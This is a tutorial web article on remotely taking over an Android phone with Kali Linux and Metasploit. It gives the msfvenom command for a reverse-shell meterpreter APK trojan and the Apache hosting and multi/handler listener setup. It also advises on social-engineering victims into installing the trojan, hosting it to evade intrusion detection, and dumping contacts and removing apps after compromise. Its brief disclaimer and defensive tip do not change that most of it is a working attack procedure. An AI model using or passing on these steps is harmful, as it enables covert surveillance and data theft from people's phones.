Open In App

Getting into Android OS remotely using Kali Linux

Improve
Improve
Like Article
Like
Save
Share
Report

We will utilize msfvenom in order to make a payload and set it aside as a ‘.apk’ file. In the execution of generating a payload, now we have to frame-up a listener to the Metasploit framework. Then, we have to manipulate the victim in order that he/she is convinced to download that payload or the ‘.apk’ the file generated earlier. Usually, social engineering is the psychological manipulation of people into performing actions or divulging confidential information. Now, once the victim installs the malevolent file then the attacker can easily get back a meterpreter session on the Metasploit. You can likewise hack an Android gadget through the Internet by utilizing your Public/External IP in the LHOST and also by the concept of ‘port forwarding’.

Note: Use the beneath techniques just for instructive/testing purposes on your own Wi-Fi or with the consent of the proprietor. Try not to utilize this for malignant purposes. 

Generating the payload

1. Type “ifconfig” into the terminal session in order to view the network interface configuration of the device we are using to execute the attack.

ifconfig

ifconfig

Here:

1. eth0 is the First Ethernet interface (Consists of ‘inet’ which shows the IP(Internet Protocol) address of our attacking machine).

2. lo is the Loopback interface.

After getting your interface IP address, we will use msfvenom that will produce a payload to infiltrate the Android OS.

2. Listing all the accessible choices with msfvenom. (This will list down all the boundaries that will assist us with producing our payload).

msfvenom -h

Now, the payload can be saved in ‘.exe’, ‘.msi’, or ‘.apk’, etc. format, but for this tutorial, we will use ‘.apk’ format as the victim’s device would an android device which supports ‘.apk‘ extension.

3.  So now we have to create a payload which we may execute on the victim’s device in order to execute the attack successfully.

msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.18.63 LPORT=4444 R> /var/www/androidhack.apk/

Here:

1. -p shows the payload type

2. android/meterpreter/reverse_tcp indicates a reverse meterpreter shell would roll in from an objective Android gadget.

3. LHOST is our IP i.e attacker’s IP

4. LPORT is the listening port on the attacker’s machine.

5. R> /var/www/html generates the output directly on apache server

6. ‘.apk’ is the file extension of the Trojan created.

This would set aside some effort(time) to produce an apk document of around 10,186 bytes.

Setting up the Attack

1. Firstly, we need to check the status of the Apache server (Web Application Server) and to do so enter the following commands in the terminal

service apache2 start
service apache2 status

apache2 service start

We, can use this(apache2) web server in order to host files, or we can put on Google Drive or Dropbox or any of the cloud providers who have shared files and then we can put those files on the server, and then the victims will not be able to detect any malicious intent because the Network Intrusion Detection System may bypass and say, Hey! This is a friendly domain we’ll let it go.

2.  Now, all seems to be set up correctly, and we can start the msfconsole.

msfconsole

msfconsole

3.  Use multi/handler exploit, set payload the same as generated previously(This will help us to generate a listener).

use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp

use multi/handler and set payload for android in metasploi

4.  Now, we will use the ‘show options’ command in order to see the configuration, set the LHOST(Local Host) and LPORT(Local Port) values the same as used in the payload (Type the following commands for the same).

show options

show options in metasploit

5.  Here, the LPORT is already set, so we just need to set the LHOST to our attacking machine’s IP, and we can do this by the following command:

set LHOST 192.168.18.63

set the LHOST in metasploit

6. Now, we can type ‘exploit’ in order to launch the desired attack.

exploit

exploit in metasploit

So, once we execute the ‘exploit‘ command, the TCP handler starts immediately. In real-life scenarios, some social engineering procedures can be utilized to let the objective download the vindictive ‘.apk’ file. For the tutorial purpose, we are simply making the victim machine download the file in the Android Phone.

Executing the attack

Exploitation:

1. Type the following web address in a web browser on the victim’s phone.

(<IP address of the attacker's machine>/<name of the trojan created earlier>.apk)
Example in this case:
192.168.18.63/androidhack.apk

2. After downloading the payload successfully, we have to select the app to install.

installing payload

Up until now, this alternative has been seen regularly when we attempt to introduce some outsider applications, and ordinarily, clients won’t falter to permit the application from obscure sources.

3.  Enable the settings to introduce applications from outside sources. Lastly hit the install choice at the base.

installing payload

Once the victim installs the application and runs it, the meterpreter session would be opened immediately at the attacker’s terminal.

Post Exploitation:

1. Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.

backgroun and sessions listing

2. You can interact with any session by typing the following command:

sessions -i [session ID]

After entering the session, type “help” to list down all the commands we can put forward in this session. You can see some file system commands that are useful when you’re attempting to pursue some touchy data or information. By utilizing these, You can undoubtedly download or transfer any document or data.

interacting with the metasploit sessions

3.  Type the following command in order to see all the apps which are installed on the particular Android OS.

app_list

4. We can also uninstall any app from the Android device.

uninstall an app

5. Now let us extract some contacts from the target device by typing “dump” and double tab. It will show all the choices to extricate from the device. Type “dump_contacts” and enter. It will separate all the contacts from the Android gadget and will spare it in our local directory. To see this document type “ls” and “cat [file_name]”

dump_contacts

This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers. There are loads of more commands available in meterpreter. Further, attempt to investigate and realize what we can perform with an Android gadget. This reason we have effectively entered the Android gadget utilizing Kali Linux and Metasploit-Framework. A sound tip to make sure about your Android gadget is to not introduce any application from an obscure source, regardless of whether you truly need to introduce it, attempt to peruse, and look at its source code to get a thought whether this file is malevolent or not.

Note:

  • The above tutorial can be successfully implemented in the case of an android 8.0 or lesser version.
  • This tutorial is made in order to give the community a basic idea of how the hackers get into our personal gadgets, and the above method is the most basic one i.e by firstly creating an android payload by msfvenom and then exploiting it using the Metasploit-framework as it is delivered using various social engineering techniques onto the victim’s phone.


Last Updated : 14 Sep, 2020
Like Article
Save Article
Previous
Next
Share your thoughts in the comments
Similar Reads